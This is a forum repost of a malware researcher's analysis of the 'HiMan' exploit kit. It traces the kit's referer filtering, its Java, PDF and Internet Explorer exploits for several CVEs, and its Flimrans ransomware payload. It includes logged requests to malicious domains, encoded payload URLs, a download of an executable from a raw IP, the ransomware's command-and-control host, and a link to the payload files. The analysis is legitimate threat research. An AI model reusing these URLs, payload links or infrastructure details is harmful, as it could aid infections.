Jump to content
thehat

HiMan Exploit Kit. Say Hi to one more.

By thehat, in Reverse engineering & exploit development

Recommended Posts

thehat Newbie

thehat

Posted
Posted

screenshot_2013-10-02_002.png

Yes it's another Exploit Kit. Good news (just because it should be less boring) there is more than two jar in that one.

Thanks to Eoin Miller for the inputs that allowed me to write this post.

f56.jpg

Talking about owls, if you never heard of Moloch (link to its presentation at ShmooCon 2013) you should give it a try (link to github) (good pcap indexer...yes...one day, thanks to tools like this, you'll see Pcap here too ;) )

So HiMan is not the real name of this Exploit Kit. It seems to be High Load but as HighLoad is a reputable security conference that stands in Russia we won't use this name. (for the same kind of reasons, we are now talking about what we previoulsy called PopAds as Magnitude).

screenshot_2013-09-30_029.png

I didn't heard about any public advert for this Exploit Kit, but ping me if there is and you know where :)

What is tricky with this one is that it seems there is whitelisting filter on referer.

Wrong referer : bye ! (obviously wrong country, wrong browser, known ip..same way).

screenshot_2013-10-02_003.png

(don't know why it's not being done directly on landing... all stats related functions in index ? ).

Post to index.php contains upper referer

screenshot_2013-10-02_005.png

To study this should help knowing which pierced armor we must show HiMan to get all the bullets :

screenshot_2013-10-01_005.png

CVE-2011-3544 : Java2

(cause CVE-2013-2465 crash for older version of jre6)

screenshot_2013-10-02_013.png

GET http://fifallllolka .info/xuguczel.php

200 OK (text/html)

GET http://fifallllolka .info/js/jquery.js

200 OK (application/javascript)

POST http://fifallllolka .info/index.php

200 OK (text/html)

screenshot_2013-10-02_014.png

java2 in HiMan 2013-10-02

screenshot_2013-10-02_016.png

We can easily see this in the noise.

GET http://fifallllolka .info/xufomav/b.jar

200 OK (application/java-archive) 378b01a6c3969089d0779aeb80185627

GET http://fifallllolka .info/com.class 404 Not Found (text/html)

GET http://fifallllolka .info/edu.class 404 Not Found (text/html)

GET http://fifallllolka .info/net.class 404 Not Found (text/html)

GET http://fifallllolka .info/org.class 404 Not Found (text/html)

GET http://fifallllolka .info/com.class 404 Not Found (text/html)

GET http://fifallllolka .info/edu.class 404 Not Found (text/html)

GET http://fifallllolka .info/net.class 404 Not Found (text/html)

GET http://fifallllolka .info/org.class 404 Not Found (text/html)

screenshot_2013-10-02_017.png

Getting System Properties for Stats Purposes

Piece of dwq.class in b.jar - HiMan 2013-10-02

screenshot_2013-10-02_015.png

And passing them to payload URLs

Piece cdcdc44 class in b.jar - HiMan 2013-10-02

GET http://fifallllolka .info/xufomav/kds.php?ex=rhi&name=BOBOB&country=US&os=Windows+XP&ver=1.6.0_16

200 OK (application/octet-stream)

Payload is a zip

screenshot_2013-10-02_012.png

containing Flimrans Ransomware :

screenshot_2013-10-02_010.png

-----------Out of topic : Payload-----------

Flimrans : 9eb1f89a74e708c27869eadb0b421ca6

(A ransomware that seems to have been first pushed in Flimkit (as dedicated family) in middle of may 2013. This was the same kind of couple as : Kore with Urausy/FakeAV.

I will make a post about it really soon. It's starting to be widely spread).

C&C :

95.211.239.222

16265 | 95.211.0.0/16 | LEASEWEB | NL | LEASEWEB.COM | LEASEWEB B.V.

GET /IccpytZxrc79KfIjQojAavSfYfhOBm4= HTTP/1.1

Host: utipiguty.de

Cache-Control: no-cache

Analysis by Joe Sandbox Cloud

--------------------------------------------

CVE-2013-2465 : Java1

screenshot_2013-10-02_007.png

GET http://fifallllllolka .info/sacixudy.php

200 OK (text/html)

GET http://fifallllllolka .info/js/jquery.js

200 OK (application/javascript)

POST http://fifallllllolka .info/index.php

200 OK (text/html)

screenshot_2013-10-02_008.png

java1() in HiMan 2013-10-02

GET http://fifallllllolka .info/sivajup/a.jar 4c1aabd2f558c453555da5ff7a7559de

200 OK (application/java-archive)

screenshot_2013-10-02_009.png

Piece of CVE-2013-2465 in a.jar

GET http://fifallllllolka .info/sivajup/kds.php?ex=jre&name=BOBOB&country=US&os=Windows+7&ver=1.6.0_45200 OK (application/octet-stream)

CVE-2013-2465 with embedded jnlp (to avoid Security Warning): java3

I'll fly over that one.

screenshot_2013-10-02_018.png

GET http://fifalllolka .info/xalbigki.php

200 OK (text/html)

GET http://fifalllolka .info/js/jquery.js

304 Not Modified () (artifact - cached here)

POST http://fifalllolka .info/index.php

200 OK (text/html)

screenshot_2013-10-02_019.png

java3 in HiMan 2013-10-02

GET http://fifalllolka .info/jumyvvu/a.jar 4c1aabd2f558c453555da5ff7a7559de (same as previously)

200 OK (application/java-archive)

GET http://fifalllolka .info/jumyvvu/kds.php?ex=jre&name=BOBOB&country=US&os=Windows+XP&ver=1.7.0_11

200 OK (application/octet-stream)

CVE-2010-0188 :

It's assumption that it's libtiff as there is an Embedded file. Didn't spend enough time on it .Wepawet and VirusTotal were helpless here.

screenshot_2013-10-02_020.png

GET http://aakrinopidarasti .info/vibqilro.php

200 OK (text/html)

GET http://aakrinopidarasti .info/js/jquery.js

200 OK (application/javascript)

POST http://aakrinopidarasti .info/index.php

200 OK (text/html)

GET http://aakrinopidarasti .info/gadgepu/d.php?h=h11t11t11p11%3A11%2F11%2F11a11a11k11r11i11n11o11p11i11d11a11r11a11s11t11i11.11i11n11f11o11%2F11g11a11d11g11e11p11u11%2F11k11d11s11.11p11h11p11%3F11e11x11%3D11a11d11%2611n11a11m11e11%3D11B11O11B11O11B11%2611c11o11u11n11t11r11y11%3D11U11S11

200 OK (application/pdf)

screenshot_2013-10-02_023.png

HiMan's PDF in PDFStreamDumper.

screenshot_2013-10-02_022.png

The object after some light deobfus

(mainly replacing "hello prettylame iwnzzz" by %)

screenshot_2013-10-02_024.png

[Have to stop here for now- will digg in it to findout why 2 payloads call ]

GET http://aakrinopidarasti .info/gadgepu/kds.php?ex=ad&name=BOBOB&country=US

200 OK (application/octet-stream) (same Flimrans)

GET http://aakrinopidarasti .info/gadgepu/kds.php?ex=ad&name=BOBOB&country=US;1

200 OK (application/octet-stream)

CVE-2013-2551 : (working here....)

Discovered by Vupen and exploited at Pwn2Own 2013

screenshot_2013-10-02_025.png

CVE-2013-2551 in HiMan - 2013-10-01

GET http://akrinopidarasti .info/wywetukr.php

200 OK (text/html)

GET http://akrinopidarasti .info/js/jquery.js

200 OK (application/javascript)

POST http://akrinopidarasti .info/index.php

200 OK (text/html)

screenshot_2013-10-02_026.png

IE Check Before Fireing

(note : on another pass)

screenshot_2013-10-02_027.png

Cleaning to see a little better

(note : it's another pass so pattern do not match this one)

GET http://akrinopidarasti .info/qywurro/sh.php?i=h79t79t79p79%3A79%2F79%2F79a79k79r79i79n79o79p79i79d79a79r79a79s79t79i79.79i79n79f79o79%2F79q79y79w79u79r79r79o79%2F79k79d79s79.79p79h79p79%3F79e79x79%3D79a79d79%2679n79a79m79e79%3D79B79O79B79O79B79%2679c79o79u79n79t79r79y79%3D79U79S79

200 OK (text/html)

screenshot_2013-10-02_030.png

Piece of CVE-2013-2551

GET http://37.200.65.58/222.exe

200 OK (application/octet-stream)

92c2ad1ca04e431100313b9468842c0d Content-Length: 1536

screenshot_2013-10-02_029.png

VT TimeStamp

What happen once "infected" ?

screenshot_2013-10-02_002.png

Exploitation Graph :

screenshot_2013-10-02_032.png

Files :

4 fiddlers and payloads (Owncloud via goo.gl)

Sursa: Malware don't need Coffee: HiMan Exploit Kit. Say Hi to one more.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...